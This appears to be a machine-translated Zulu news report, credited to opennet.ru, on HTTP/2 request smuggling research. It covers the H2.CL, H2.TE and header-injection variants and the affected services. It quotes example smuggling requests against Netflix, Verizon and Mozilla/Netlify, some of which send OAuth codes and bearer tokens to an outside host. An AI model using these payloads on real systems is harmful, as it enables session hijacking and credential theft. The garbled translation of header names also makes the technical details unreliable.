Amasistimu ewebhu lapho isiphetho sangaphambili samukela ukuxhumana nge-HTTP/2 futhi sikudlulisele emuva nge-HTTP/1.1 avezwe kokuhlukile okusha kokuhlasela kwe-“HTTP Request Smuggling”, okuvumela, ngokuthumela izicelo zeklayenti eziklanywe ngokukhethekile, ukuze ngena phakathi kokuqukethwe kwezicelo ezivela kwabanye abasebenzisi ezicutshungulwe ngendlela efanayo phakathi kwe-frontend ne-backend. Ukuhlasela kungasetshenziswa ukufaka ikhodi ye-JavaScript enonya kuseshini enewebhusayithi esemthethweni, amasistimu wokuvinjelwa kokudlula futhi ubambe amapharamitha wokuqinisekisa.
Inkinga ithinta ama-proxies ewebhu, izilinganisi zokulayisha, izisheshisi zewebhu, amasistimu okulethwa kokuqukethwe nokunye ukulungiselelwa lapho izicelo ziqondiswa khona kabusha ngendlela ebheke phambili ukuya emuva. Umbhali wocwaningo ubonise ukuthi kungenzeka yini ukuhlasela izinhlelo ze-Netflix, Verizon, Bitbucket, Netlify CDN kanye ne-Atlassian, futhi wathola amadola ayizinkulungwane ezingama-56 ezinhlelweni zomvuzo zokuhlonza ubungozi. Inkinga iphinde yaqinisekiswa emikhiqizweni ye-F5 Networks. Inkinga ithinta kancane i-mod_proxy kuseva ye-Apache http (CVE-2021-33193), ukulungiswa kulindeleke kunguqulo 2.4.49 (abathuthukisi bazisiwe ngenkinga ekuqaleni kukaMeyi futhi banikezwa izinyanga ezi-3 zokuyilungisa). Ku-nginx, ikhono lokucacisa ngasikhathi sinye izihloko ze-“Content-Length” kanye “Ne-Transfer-Encoding” livinjiwe ekukhishweni kokugcina (1.21.1). Amathuluzi okuhlasela asevele afakiwe kukhithi yamathuluzi ye-Burp futhi atholakala ngendlela yesandiso se-Turbo Intruder.
Umgomo wokusebenza kwendlela entsha yokufaka izicelo kuthrafikhi ufana nokuba sengozini okukhonjwe umcwaningi ofanayo eminyakeni emibili edlule, kodwa kukhawulelwe ezindaweni ezingaphambili ezamukela izicelo nge-HTTP/1.1. Masikhumbule ukuthi ohlelweni lwe-frontend-backend, izicelo zamakhasimende zitholwa i-node eyengeziwe - i-frontend, esungula uxhumano lwe-TCP oluhlala isikhathi eside ne-backend, olucubungula izicelo ngokuqondile. Ngalokhu kuxhumana okuvamile, izicelo ezivela kubasebenzisi abahlukene zivame ukudluliselwa, ezilandela iketango ngokulandelana, zihlukaniswe ngephrothokholi ye-HTTP.
Ukuhlasela kwakudala kwe-“HTTP Request Smuggling” bekusekelwe eqinisweni lokuthi abaphambili nangemuva batolika ukusetshenziswa kwezihloko ze-HTTP “Ubude-Bokuqukethwe” (kunquma isamba sikasayizi wedatha esicelweni) kanye “nombhalo Wokudluliswa Kwekhodi: I-chunked” (ivumela idatha ezodluliswa ngezingxenye) ngokuhlukile. . Isibonelo, uma indawo engaphambili isekela kuphela "Ubude Bokuqukethwe" kodwa indiva okuthi "Dlulisa-Umbhalo Wekhodi: i-chunked", umhlaseli angathumela isicelo esiqukethe kokubili izihloko "Zobude-Okuqukethwe" kanye "Nekhodi Yokudlulisa: Izinhlamvu", kodwa usayizi "Ubude-Okuqukethwe" abufani nosayizi weketango elisikiwe. Kulesi simo, indawo engaphambili izocubungula futhi iqondise kabusha isicelo ngokuvumelana “nobude-bokuqukethwe”, futhi indawo engemuva izolinda ukuqedwa kwebhulokhi ngokusekelwe kokuthi “Dlulisa-Umbhalo Wekhodi: I-chunked” kanye nomsila osele wesicelo somhlaseli kube ekuqaleni kwesicelo somunye umuntu esithunyelwa ngokulandelayo.
Ngokungafani nephrothokholi yombhalo i-HTTP/1.1, encozululwa kuleveli yomugqa, i-HTTP/2 iyiphrothokholi kanambambili futhi iphatha amabhulokhi edatha kasayizi oshiwo ngaphambili. Nokho, i-HTTP/2 isebenzisa izihloko ezingamanga ezihambisana nezihloko ezijwayelekile ze-HTTP. Esimeni sokusebenzisana ne-backend ngephrothokholi ye-HTTP/1.1, indawo engaphambili ihumusha lezi zihloko ezingamanga zibe izihloko ezifanayo ze-HTTP HTTP/1.1. Inkinga ukuthi i-backend yenza izinqumo mayelana nokudlulisa ukusakaza ngokusekelwe kumaheda e-HTTP asethwe indawo engaphambili, ngaphandle kokuba nolwazi mayelana nemingcele yesicelo sokuqala.
Ikakhulukazi, amanani "ubude bokuqukethwe" kanye "nombhalo wokudlulisa" angasakazwa ngendlela yamaheda-mbumbulu, naphezu kweqiniso lokuthi awasetshenziswa ku-HTTP/2, njengoba usayizi wayo yonke idatha unqunywa. ensimini ehlukene. Nokho, phakathi nenqubo yokuguqula isicelo se-HTTP/2 ku-HTTP/1.1, lezi zihloko zithwalwa futhi zingadida i-backend. Kunezinhlobo ezimbili eziyinhloko zokuhlasela: i-H2.TE ne-H2.CL, lapho ingemuva lidukiswa ukudluliswa kwekhodi okungalungile noma inani lobude bokuqukethwe elingahambisani nosayizi wangempela wendikimba yesicelo etholwe yi-frontend ngokusebenzisa Iphrothokholi ye-HTTP/2.
Isibonelo sokuhlasela kwe-H2.CL ukucacisa usayizi ongalungile kusihloko mbumbulu sobude bokuqukethwe lapho uthumela isicelo se-HTTP/2 ku-Netflix. Lesi sicelo siholela ekwengezweni kwesihloko esifanayo se-HTTP Ubude Bokuqukethwe lapho ufinyelela i-backend nge-HTTP/1.1, kodwa njengoba usayizi ku-Content-Length ucaciswa ngaphansi kwalowo wangempela, ingxenye yedatha emsileni icutshungulwa njenge ukuqala kwesicelo esilandelayo.
Isibonelo, cela i-HTTP/2 :indlela ethi THUMELA :indlela /n :igunya www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Umsingathi: 02.rs?x.netflix.com Foo: ibha
Kuzoholela ekuthunyelweni kwesicelo ku-backend: POST /n HTTP/1.1 Umsingathi: www.netflix.com Ubude-Okuqukethwe: 4 abcdGET /n HTTP/1.1 Umsingathi: 02.rs?x.netflix.com Foo: ibha
Njengoba Ubude Bokuqukethwe bunenani elingu-4, indawo engemuva izokwamukela kuphela i-“abcd” njengendikimba yesicelo, futhi yonke ingxenye ethi “GET /n HTTP/1.1...” izocutshungulwa njengesiqalo sesicelo esilandelayo. ehlobene nomunye umsebenzisi. Ngokufanelekile, ukusakaza kuzonqanyulwa futhi ngokuphendula isicelo esilandelayo, umphumela wokucubungula isicelo se-dummy uzokhishwa. Endabeni ye-Netflix, ukucacisa umsingathi wenkampani yangaphandle kokuthi “Isingethe:” unhlokweni esicelweni esiyimbumbulu kuphumele ekutheni iklayenti libuyisele impendulo ethi “Indawo: https://02.rs?x.netflix.com/n” futhi kuvunyelwe okuqukethwe okunganaki ukuthi kuthunyelwe kuklayenti, okuhlanganisa Qalisa ikhodi yakho ye-JavaScript kumongo wesayithi le-Netflix.
Inketho yesibili yokuhlasela (H2.TE) ihlanganisa ukufaka esikhundleni sikanhlokweni othi “Dlulisa-Umbhalo Wekhodi: chunked”. Ukusetshenziswa kwesihloko mbumbulu sokudlulisa-encoding ku-HTTP/2 kunqatshelwe ukucaciswa futhi izicelo ezihambisana naso zinqunywe ukuthi zithathwe njengezingalungile. Ngaphandle kwalokhu, okunye ukusetshenziswa kwe-frontend akunaki le mfuneko futhi kuvumela ukusetshenziswa kwesihloko mbumbulu sokudlulisa-encoding ku-HTTP/2, esiguqulelwa sibe unhlokweni we-HTTP ofanayo. Uma kukhona unhlokweni othi “Dlulisa-Umbhalo Wekhodi”, indawo engemuva ingayithatha njengento ebaluleke kakhulu futhi ihlukanise ucezu ngalunye lwedatha kumodi “esikiwe” kusetshenziswa amabhulokhi anosayizi abahlukene ngefomethi ethi “{size}\r\n{block }\r\n{size} \r\n{block}\r\n0", naphezu kokuhlukaniswa kokuqala ngosayizi uwonke.
Ukuba khona kwegebe elinjalo kuboniswe ngesibonelo se-Verizon. Inkinga iphathelene nengosi yokuqinisekisa kanye nesistimu yokuphatha okuqukethwe, ebuye isetshenziswe kumasayithi afana ne-Huffington Post ne-Engadget. Isibonelo, isicelo seklayenti nge-HTTP/2: :indlela THUMELA :indlela /identitfy/XUI :igunya id.b2b.oath.com transfer-encoding chunked 0 GET /oops HTTP/1.1 Umsingathi: psres.net Ubude Bokuqukethwe: 10 x=
Iphumele ekuthumeleni isicelo se-HTTP/1.1 kungemuva: POST /identity/XUI HTTP/1.1 Umsingathi: id.b2b.oath.com Content-Length: 66 Transfer-Encoding: chunked 0 GET /oops HTTP/1.1 Umsingathi: psres. Ingqikithi Yokuqukethwe- Ubude: 10x=
Ingemuva, yona, yaziba inhlokweni ethi "Ubude-Okuqukethwe" futhi yenza ukuhlukanisa phakathi kokusakaza okusekelwe kokuthi "Dlulisa-Umbhalo Wekhodi: chunked". Empeleni, ukuhlasela kwenze kwaba nokwenzeka ukuqondisa kabusha izicelo zabasebenzisi kuwebhusayithi yabo, okuhlanganisa ukwamukela izicelo ezihlobene nokuqinisekiswa kwe-OAuth, izinhlaka zazo eziboniswe kunhlokweni ye-Referer, kanye nokulingisa iseshini yokuqinisekisa nokucupha isistimu yomsebenzisi ukuthumela imininingwane. kumsingathi womhlaseli. THOLA /b2blanding/show/oops HTTP/1.1 Umsingathi: psres.net Isithenjwa: https://id.b2b.oath.com/?…&code=secret GET / HTTP/1.1 Umsingathi: psres.net Ukugunyazwa: I-Bearer eyJhcGwiOiJIUzI1Gi1sIkIk6…
Ukuze uhlasele ukusetshenziswa kwe-HTTP/2 okungakuvumeli ukuba kucaciswe unhlokweni mbumbulu wokudlulisa-encoding, enye indlela iye yahlongozwa ehilela ukufaka esikhundleni isihloko esithi “Dlulisa-Umbhalo Wekhodi” ngokusinamathisela kwezinye izihloko-mbumbulu ezihlukaniswa ngohlamvu lomugqa omusha ( lapho iguqulelwa ku-HTTP/1.1 kulokhu idala izihloko ezimbili ezihlukene ze-HTTP).
Isibonelo, i-Atlassian Jira kanye ne-Netlify CDN (esetshenziselwa ukusebenzela ikhasi lokuqala le-Mozilla kuFirefox) bathintwa yile nkinga. Ngokukhethekile, isicelo se-HTTP/2 :indlela ethi THUMELA :indlela / :igunya start.mozilla.org foo b\r\n ukudlulisa-encoding: chunked 0\r\n \r\n GET / HTTP/1.1\r\n Umsingathi : evil-netlify-domain\r\n Ubude-Okuqukethwe: 5\r\n \r\nx=
kubangele ukuthi isicelo se-HTTP/1.1 POST / HTTP/1.1 sithunyelwe ku-backend\r\n Umsingathi: start.mozilla.org\r\n Foo: b\r\n Ukudlulisa-Umbhalo Wekhodi: chunked\r\n Ubude Bokuqukethwe : 71\ r\n \r\n 0\r\n \r\n THOLA / HTTP/1.1\r\n Umsingathi: ububi-netlify-domain\r\n Ubude-Okuqukethwe: 5\r\n \r \nx=
Enye inketho yokushintsha isihloko esithi “Dlulisa-Umbhalo Wekhodi” kwakuwukunamathisela egameni lenye inhlokweni mbumbulu noma emugqeni osebenzisa indlela yokucela. Isibonelo, lapho ufinyelela i-Atlassian Jira, igama-mbumbulu lesihloko esithi "foo: bar\r\ntransfer-encoding" enenani elithi "chunked" libangele ukuthi kwengezwe izihloko ze-HTTP ezithi "foo: bar" kanye nethi "transfer-encoding: chunked" .
Umcwaningi ohlonze inkinga uphinde wahlongoza isu lokucela umhubhe ukuze uhlasele izindawo ezingaphambili, lapho ikheli le-IP ngalinye lisungula ukuxhumana okuhlukile ku-backend futhi ithrafikhi evela kubasebenzisi abahlukene ayixubekile. Inqubo ehlongozwayo ayikuvumeli ukugxambukela kwezicelo zabanye abasebenzisi, kodwa yenza kube nokwenzeka ukufaka ushevu kunqolobane okwabelwana ngayo ethinta ukucutshungulwa kwezinye izicelo, futhi ivumela ukushintshwa kwezihloko ze-HTTP zangaphakathi ezisetshenziselwa ukudlulisa ulwazi lwesevisi lusuka endaweni engaphambili luye ku-backend ( isibonelo, uma uqinisekisa ohlangothini olungaphambili kokuthi Izihloko ezinjalo zingadlulisela ulwazi mayelana nomsebenzisi wamanje kungemuva). Njengesibonelo sokusebenzisa indlela ekusebenzeni, usebenzisa ubuthi be-cache, kwakungenzeka ukuthola ukulawula amakhasi kusevisi ye-Bitbucket.
Source: opennet.ru